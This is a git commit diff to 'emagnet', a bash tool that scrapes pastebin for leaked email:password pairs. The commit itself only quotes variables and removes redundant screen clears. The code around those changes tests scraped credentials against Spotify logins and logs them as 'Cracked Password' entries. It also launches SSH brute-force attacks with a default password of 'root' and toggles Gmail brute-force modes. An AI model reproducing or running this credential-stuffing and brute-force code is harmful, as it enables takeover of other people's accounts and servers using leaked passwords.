fixed so we wont clear and print banner more then needed

diff --git a/emagnet b/emagnet
--- a/emagnet
+++ b/emagnet
@@ -201,8 +201,6 @@ fi
 if [[ ! -f "$CONF" ]]; then
        mustberoot
        colors
-       clear
-       banner
        conf
        mustbefilled
        paths
@@ -225,11 +223,11 @@ noticeaboutscraping() {
  }
 
 heavyload() {
-			if [[ -z $USERAGENT ]]; then
+			if [[ -z "$USERAGENT" ]]; then
 				echo -e "$basename$0: internal errror -- you must set a useragent in $CONF"
 				exit
          	fi
-curl -sL $PASTEBIN -H $USERAGENT \
+curl -sL "$PASTEBIN" -H "$USERAGENT" \
 |grep -q "is under heavy load right now"
   if [[ "$?" = "0" ]]; then
    for (( ; ; )); do
@@ -250,7 +248,7 @@ curl -sL $PASTEBIN -H $USERAGENT \
 
 Iwasbanned() {
 . "$CONF"
-if [[ -z $USERAGENT ]]; then
+if [[ -z "$USERAGENT" ]]; then
 	echo -e "$basename$0: internal errror -- you must set a useragent in $CONF"
 	exit
 fi
@@ -386,8 +384,6 @@ temp_cnt=${wait_time}
 
 countdown() {
     conf
-    clear
-    banner
 if [[ ${GBRUTEFORCE} = "true" ]]; then
       sed -i '118d' "$CONF"
       sed -i '118 i GBRUTEFORCE=true' "$CONF"
@@ -399,7 +395,7 @@ if [[ ${GBRUTEFORCE} = "true" ]]; then
       printf "%19s \e[1;31m$(echo -e "\e[1;34mG\e[1;31mM\e[1;33mA\e[1;34mi\e[0;32mL\e\e[0m") BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n"
       printf "\n%64s \n" | tr ' ' '='
       echo
-    analyzer
+      analyzer
 elif [[ ${PBRUTEFORCE} = "true" ]]; then
       sed -i '118d' "$CONF"
       sed -i '118 i GBRUTEFORCE=false' "$CONF"
@@ -432,18 +428,18 @@ else
       sed -i '120d' "$CONF"
       sed -i '120 i PBRUTEFORCE=false' "$CONF"
       conf
-    analyzer
+      analyzer
 fi
 }
 
 blocked() { 
 	conf
-	if [[ -z $USERAGENT ]]; then
-		echo -e "$basename$0: internal errror -- you must set a useragent"
+	if [[ -z "$USERAGENT" ]]; then
+		echo -e "$basename$0: internal errror -- you must set a useragent in $CONF"
 		exit
 	fi
-		if [[ ! -s /tmp/.emagnet ]]; then 
-		curl -h "$HEADER"-Ls $PASTEBIN -H $USERAGENT> /tmp/.emagnet
+		if [[ ! -s "/tmp/.emagnet" ]]; then 
+		curl -h "$HEADER"-Ls "$PASTEBIN" -H "$USERAGENT" > /tmp/.emagnet
 fi; 
 }
 
@@ -452,7 +448,7 @@ VERSION="0.6.0"
 WWWSOURCE="https://nr1.nu/archive/sconsify"
 SCONSIFY="${WWWSOURCE}/linux-x86_64-sconsify-${VERSION}.next.zip"
 SPOTIFY_TARGETS="/tmp/.emagnet-passwords"
-grep -rEiEio "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b:...*" $EMAGNETTEMP \
+grep -rEiEio "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b:...*" "$EMAGNETTEMP" \
 |awk '{print $1}' \
 |cut -d':' -f2,3 \
 |cut -d'|' -f1 \
@@ -467,23 +463,25 @@ SPOTIFY_PASS="$(echo $line|cut -d: -f2)"
              echo -e "[\e[1;31m<<\e[0m] - Wrong Password: ${SPOTIFY_USER}:${SPOTIFY_PASS}"
           else
               echo -e "[\e[1;32m>>\e[0m] - Cracked Password: ${SPOTIFY_USER}:${SPOTIFY_PASS}"
-              echo -e "================================================================"     >>    $EMAGNETLOGS/cracked-spotify-passwords.txt
-              echo -e "[+] Login Details For SPOTIFY - Cracked $(date +%d/%m/%Y\ -\ %H:%M)"  >>    $EMAGNETLOGS/cracked-spotify-passwords.txt
-              echo -e "[+]------------------------------------------------------------"      >>    $EMAGNETLOGS/cracked-spotify-passwords.txt
-              echo -e "[+] Username: ${SPOTIFY_USER}"                                        >>    $EMAGNETLOGS/cracked-spotify-passwords.txt
-              echo -e "[+] Password: ${SPOTIFY_PASS}"                                        >>    $EMAGNETLOGS/cracked-spotify-passwords.txt
-              echo -e "================================================================\n\n" >>    $EMAGNETLOGS/cracked-spotify-passwords.txt
+              echo -e "================================================================"     >>    "$EMAGNETLOGS/cracked-spotify-passwords.txt"
+              echo -e "[+] Login Details For SPOTIFY - Cracked $(date +%d/%m/%Y\ -\ %H:%M)"  >>    "$EMAGNETLOGS/cracked-spotify-passwords.txt"
+              echo -e "[+]------------------------------------------------------------"      >>    "$EMAGNETLOGS/cracked-spotify-passwords.txt"
+              echo -e "[+] Username: ${SPOTIFY_USER}"                                        >>    "$EMAGNETLOGS/cracked-spotify-passwords.txt"
+              echo -e "[+] Password: ${SPOTIFY_PASS}"                                        >>    "$EMAGNETLOGS/cracked-spotify-passwords.txt"
+              echo -e "================================================================\n\n" >>    "$EMAGNETLOGS/cracked-spotify-passwords.txt"
           fi
 
 done < /tmp/.emagnet-passwords.txt
 }
 
 sshbruter() {
-if [[ -z $SSHPASS ]]; then
+  hash parallel &> /dev/null
+( [[ "$?" -ne "0" ]] && echo -e "$basename$0: internal error -- parallel package is required to be installed.."; exit 1 )
+if [[ -z "$SSHPASS" ]]; then
    echo -e "You must set a password to use during the attack"
    read -p "Enter a password or hit enter for default (Default: root) " sshpassb
    echo
-       if [[ -n $sshpassb ]]; then
+       if [[ -n "$sshpassb" ]]; then
        sed -i '170d' z
        sed -i "170 i SSHPASS=$sshpassb" "$CONF"
      else
@@ -760,7 +758,7 @@ else
         printf "%17s[\e[1;31m00\e[0m] - No Passwords Was Found\n\n"
         printf "%17s[\e[1;31m00\e[0m] - No Email Address Was Found\n\n"
 
-            if [[ $NOTIFY = "true" ]]; then
+            if [[ "$NOTIFY" = "true" ]]; then
                notify-send "Emagnet" "\n$tt - Files downloaded\n00 - Passwords found\n00 - Email addresses found"
             fi
                sleep 3.2
@@ -781,8 +779,7 @@ if [[ $? = "0" ]]; then
 fi
 
 for (( ; ; )); do 
-  clear
-  banner
+  conf
   countdown
   clear
   banner
@@ -820,7 +817,7 @@ check4all() {
      conf
 }
 
-[[ -z $1 ]] && usage
+( [[ -z $1 ]] && usage; exit 1 )
 
 
 case $1 in
